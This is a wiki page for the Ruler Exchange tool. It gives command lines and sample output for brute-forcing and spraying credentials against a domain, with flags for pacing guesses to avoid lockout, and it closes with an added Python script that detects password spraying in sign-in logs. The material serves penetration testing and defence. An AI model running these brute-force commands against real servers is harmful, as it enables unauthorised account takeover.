Brute Force

Dominic White edited this page Dec 2, 2019 · 3 revisions

Understanding Autodiscover

While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:

  • Autodiscover deployed over HTTP and not HTTPS (we default to HTTPS as this is more common)
  • No autodiscover DNS record
  • Authentication failing

If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:

./ruler --url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml

If you run into issues with authentication (and you know the creds are correct), you can try to force the use of basic authentication with the global --basic flag.

The global --verbose flag will also give you some insight into the process being used by the autodiscover service.

Brute-force for credentials

If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.

./ruler --domain targetdomain.com brute --users /path/to/user.txt --passwords /path/to/passwords.txt

You should see your brute-force in action:

./ruler --domain evilcorp.ninja --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose

[*] Starting bruteforce
[x] Failed: bob.dole:P@ssw0rd
[x] Failed: george.bush:P@ssw0rd
[x] Failed: bill.clinton:P@ssw0rd
[x] Failed: bob.dole:August2016
[x] Failed: george.bush:August2016
[+] Success: bill.clinton:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: bob.dole:Evilcorp@2016
[x] Failed: george.bush:Evilcorp@2016
[x] Failed: bob.dole:3V1lc0rp
[x] Failed: george.bush:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: george.bush:Password1
[+] Success: bob.dole:Password1

Alternatively, you can specify a userpass file with the --userpass option. The userpass file should be colon-delimited with one pair of credentials per line:

$ cat userpass.txt
bill.clinton:August2016
george.bush:Password!2016
bob.dole:Password1

./ruler --domain evilcorp.ninja --insecure brute --userpass userpass.txt -v

[*] Starting bruteforce
[+] Success: bill.clinton:August2016
[x] Failed: george.bush:Password!2016
[+] Success: bob.dole:Password1

There are a few other flags that work with brute:

  • --stop //stop on the first valid username:password combo
  • --delay //how long to wait between multiple password guesses
  • --attempts //how many attempts before we delay (attempts per user)
  • --insecure //if the Exchange server has a bad SSL certificate
  • --verbose //be verbose and show failed attempts
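
Seen from the server side, the run shown above is one source failing against several accounts in quick succession, with only a few failures per account and pauses between rounds, so per-account lockout counters tend not to trip. The following is an added detection example, not part of Ruler or the original page; the normalized log format, the function names and the thresholds are assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in an assumed normalized format:
# "<ISO time> <source IP> <account> <FAIL|OK>"
SAMPLE_LOG = """\
2019-12-02T10:00:01 203.0.113.7 bob.dole FAIL
2019-12-02T10:00:02 203.0.113.7 george.bush FAIL
2019-12-02T10:00:03 203.0.113.7 bill.clinton FAIL
2019-12-02T10:00:04 203.0.113.7 bob.dole FAIL
2019-12-02T10:00:05 203.0.113.7 george.bush FAIL
2019-12-02T10:00:06 203.0.113.7 bill.clinton OK
2019-12-02T10:05:00 198.51.100.20 alice.smith FAIL
2019-12-02T10:05:30 198.51.100.20 alice.smith OK
2019-12-02T11:00:07 203.0.113.7 bob.dole FAIL
2019-12-02T11:00:08 203.0.113.7 george.bush FAIL
2019-12-02T11:00:09 203.0.113.7 bob.dole OK
"""

def parse(log):
    """Yield (time, source, account, result); malformed lines are skipped."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2].lower(), parts[3]

def detect_spray(log, window=timedelta(minutes=10), min_accounts=3):
    """Flag sources whose failures hit >= min_accounts distinct accounts in one window."""
    recent = defaultdict(list)  # source -> [(time, account)] failures still in window
    flagged = {}                # source -> {"accounts": set, "compromised": set}
    for ts, src, user, result in sorted(parse(log)):
        if result == "FAIL":
            recent[src] = [(t, u) for t, u in recent[src] if ts - t <= window]
            recent[src].append((ts, user))
            accounts = {u for _, u in recent[src]}
            if len(accounts) >= min_accounts:
                entry = flagged.setdefault(src, {"accounts": set(), "compromised": set()})
                entry["accounts"] |= accounts
        elif result == "OK" and src in flagged:
            # The flag outlives the window, so a success after a long pause
            # between rounds is still tied to the spraying source.
            flagged[src]["compromised"].add(user)
    return flagged

if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_LOG).items():
        print(src, sorted(info["accounts"]), "reset:", sorted(info["compromised"]))
```

A shared proxy or NAT gateway can legitimately exceed the threshold, so `window` and `min_accounts` need tuning to the environment.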